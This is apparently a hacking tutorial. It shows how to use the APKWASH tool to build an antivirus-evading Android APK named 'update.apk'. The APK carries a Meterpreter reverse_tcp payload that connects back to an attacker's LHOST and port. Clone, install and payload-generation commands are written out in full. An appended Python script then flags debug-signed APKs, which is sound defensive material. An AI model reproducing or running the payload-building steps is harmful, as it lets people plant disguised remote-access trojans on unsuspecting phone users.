Bypassing antivirus on Android is one of the most difficult tasks. Well, at least it used to be until we got tools like apk bleach. Now there is yet another tool called APKWASH which can hide malicious apps from being discovered by most antivirus products. It shows how weak antivirus software is and why you should not download apps from unknown sources. Let's start the tutorial to show you how hackers bypass antivirus protection on Android:
Step 1: Clone the APKWASH tool in Kali Linux with the following command:
git clone https://github.com/jbreed/apkwash.git
Step 2: Give the tool execution permissions and move it into your path with the following commands:
chmod +x apkwash
mv apkwash /usr/local/bin/.
Step 3: Now we can use the following command to make the malicious file:
apkwash -p android/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=1337 -o update.apk
Below are the options you can use to make the malicious files:
-p | --payload <payload> This sets the payload to be generated by msfvenom.
-o | --output <outfile.apk> This sets the name of the APK created as well as the output apk file.
-x | --original <infile.apk> Input APK to inject the payload into (later update).
-g | --generate Generate a payload using defaults
-n | --newkey Generate a new debug key before signing
-v | --verbose Don't mask output of commands
-d | --debug Leaves the /tmp/payload files in place for review
-h | --help Help information
Step 4: Now you have the malicious apk file which cannot be detected by antivirus. There are a few antivirus products that might flag this file as a virus, but it's rare and doesn't happen frequently.
Feel free to edit the script and improve it if you are great at coding and scripting.
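For defenders, the -n option above points at a check that does not depend on antivirus signatures: an APK signed with a debug key is not a release build and should not be installed from an unknown source. The following triage script is an added example, not part of APKWASH or the original tutorial; it assumes the signer uses the Android SDK's default debug subject "CN=Android Debug" and only inspects v1 (JAR) signature blocks, and its sample APKs are constructed inline.

```python
import io
import re
import zipfile

# v1 (JAR) signature blocks live under META-INF/ with these extensions.
SIG_BLOCK = re.compile(r"^META-INF/[^/]+\.(RSA|DSA|EC)$", re.IGNORECASE)
# Assumption: the debug certificate carries the SDK default subject string.
DEBUG_MARKERS = (b"Android Debug",)


def triage_apk(data: bytes) -> dict:
    """Return signing observations for an APK supplied as raw bytes."""
    result = {"valid_zip": False, "sig_blocks": [], "debug_signed": False}
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result
    result["valid_zip"] = True
    with archive:
        for name in archive.namelist():
            if not SIG_BLOCK.match(name):
                continue
            result["sig_blocks"].append(name)
            # Certificate subject strings are normally stored as plain bytes
            # in DER, so a substring search is enough for first-pass triage.
            blob = archive.read(name)
            if any(marker in blob for marker in DEBUG_MARKERS):
                result["debug_signed"] = True
    return result


def verdict(data: bytes) -> str:
    """Map the observations to a handling decision."""
    info = triage_apk(data)
    if not info["valid_zip"]:
        return "not-an-apk"
    if info["debug_signed"]:
        return "reject: debug-signed"
    if not info["sig_blocks"]:
        return "review: no v1 signature block"
    return "pass: continue with other checks"


def build_sample(cert_bytes) -> bytes:
    """Constructed sample: a minimal zip standing in for an APK."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", b"dex\n035\x00")
        if cert_bytes is not None:
            z.writestr("META-INF/CERT.RSA", cert_bytes)
    return buf.getvalue()
```

A "pass" here only means the debug-key heuristic did not fire; an APK signed solely with the v2 or later scheme lands in "review" and needs a full signature verifier.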